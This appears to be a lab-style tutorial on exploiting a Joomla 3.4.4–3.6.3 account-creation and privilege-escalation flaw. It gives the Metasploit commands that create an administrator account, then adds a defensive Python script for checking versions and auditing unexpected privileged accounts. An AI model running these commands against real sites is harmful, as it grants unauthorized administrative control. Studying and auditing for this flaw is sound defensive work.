Exploiting Joomla using Account Creation and Privilege Escalation

In this article we will learn about hacking Joomla CMS. To do so we will use a pre-installed Metasploit module that creates an arbitrary account with administrative privileges in Joomla versions 3.4.4 through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).

Exploit Targets

Joomla 3.4.4 through 3.6.3

Attacker: Kali Linux

Victim PC: Joomla 3.4.4

Open a terminal in Kali and type msfconsole to start Metasploit.

Once Metasploit is open, type the following commands to execute the attack:

use auxiliary/admin/http/joomla_registration_privesc

msf exploit (joomla_registration_privesc)>set rhost

msf exploit (joomla_registration_privesc)>set username raj

msf exploit (joomla_registration_privesc)>set password raj123

msf exploit (joomla_registration_privesc)>set email [email protected]

msf exploit (joomla_registration_privesc)>set targeturi /joomla

msf exploit (joomla_registration_privesc)>exploit

Performing this attack lets you create an account with a username and password of your choice; in this case I have given username raj and password raj123, along with email ID [email protected]

In the image below you can see that a new user has been created with the username and password that you provided.

Now that the account has been created, you can log in using that username.

Thus, you can hack Joomla CMS in the simplest of ways.
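Seen from the site owner's side, the walkthrough above comes down to two checks: is the installed Joomla version inside the affected range, and does any privileged account exist that nobody on the team created. The Python below is an added example, not part of the original article or of Joomla or Metasploit. The CSV export layout, the allowlist and the sample rows are constructed for illustration, and the group names are assumed to be Joomla's defaults.

```python
import csv
import io

AFFECTED_MIN = (3, 4, 4)   # affected range as stated in the article
AFFECTED_MAX = (3, 6, 3)
# Assumption: Joomla's default privileged group names.
PRIVILEGED_GROUPS = {"Super Users", "Administrator"}

def parse_version(text):
    """Turn '3.6.3' or '3.5' into a (major, minor, patch) tuple; any '-suffix' is ignored."""
    core = text.strip().split("-")[0].split(".")
    nums = [int(p) for p in core[:3]]
    return tuple(nums + [0] * (3 - len(nums)))

def in_affected_range(version_text):
    return AFFECTED_MIN <= parse_version(version_text) <= AFFECTED_MAX

def unexpected_privileged(users_csv, known_admins):
    """Return privileged accounts that are not on the allowlist.

    Disabled accounts are reported too: the article notes the created account
    starts disabled, so 'disabled' is not evidence of 'harmless'.
    """
    findings = []
    for row in csv.DictReader(io.StringIO(users_csv)):
        groups = {g.strip() for g in row["groups"].split("|")}
        hits = groups & PRIVILEGED_GROUPS
        if hits and row["username"].lower() not in known_admins:
            findings.append({
                "username": row["username"],
                "groups": sorted(hits),
                "registered": row["registered"],
                "state": "disabled" if row["blocked"] == "1" else "active",
            })
    return findings

# Constructed sample export (hypothetical columns, not a Joomla file format).
SAMPLE_USERS = """username,email,groups,registered,blocked
siteadmin,admin@example.org,Super Users,2015-02-11 09:14:02,0
editor1,ed@example.org,Editor|Registered,2016-03-02 17:40:55,0
raj,user@example.org,Administrator|Registered,2016-10-28 03:12:40,1
"""

if __name__ == "__main__":
    print("3.4.4 affected:", in_affected_range("3.4.4"))
    for finding in unexpected_privileged(SAMPLE_USERS, {"siteadmin"}):
        print("REVIEW:", finding)
```

Any account this reports should be traced back to whoever created it. On a site in the affected range, the Joomla upgrade is the fix; deleting the account alone is not.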
